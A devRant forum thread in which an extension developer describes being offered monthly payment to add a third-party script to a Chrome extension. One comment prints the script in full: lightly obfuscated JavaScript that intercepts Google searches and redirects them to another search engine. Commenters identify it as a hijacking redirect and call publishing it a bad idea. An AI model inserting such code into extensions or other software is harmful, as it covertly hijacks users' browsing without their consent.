Ranter
Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Comments
-
Why not use the script in a virtual box and get the free dollars
(Unless um they try to steal your data without paying...) -
@cyberhawara @terraria99
Here you go :
function Malmar(){var blog = 'go';var bulb = 'og';var car = 'le.';chrome.webRequest.onBeforeRequest.addListener(function(e){if(-1!=e.url.indexOf(blog+bulb+car)&&-1!=e.url.indexOf("/search?")&&-1==e.url.indexOf("tbm=")){return{redirectUrl:"https://defendsearch.com/search/...(function(e,n){n||(n=window.location.href),e=e.replace(/[\[\]]/g,"\\$&");var r=new RegExp("[?&]"+e+"(=([^&#]*)|&|#|$)").exec(n);return r?r[2]?decodeURIComponent(r[2].replace(/\+/g," ")):"":null}("q",e.url))}}},{urls:["<all_urls>"]},["blocking"])}
Malmar(); -
@TheAnimatrix hmm I guess they will check manually every month if the script is running, or what do you mean by virtualbox ?
-
@goldendousa virtual box is a virtual environment where you can install an operating system and run programs in without actually installing em on your main os.
-
@goldendousa looks like all the script does is redirect you to their search engine if you are using something else.
-
@TheAnimatrix yeah it will be a bad idea to publish such a thing for my extension users
I just received an email from a weird company they wanted to offer me 150 dollars monthly to insert a script in my google chrome extension, when I asked about the script they sent me a function called "malmare"...
...
Nice...
rant
malware
chrome extension
javascript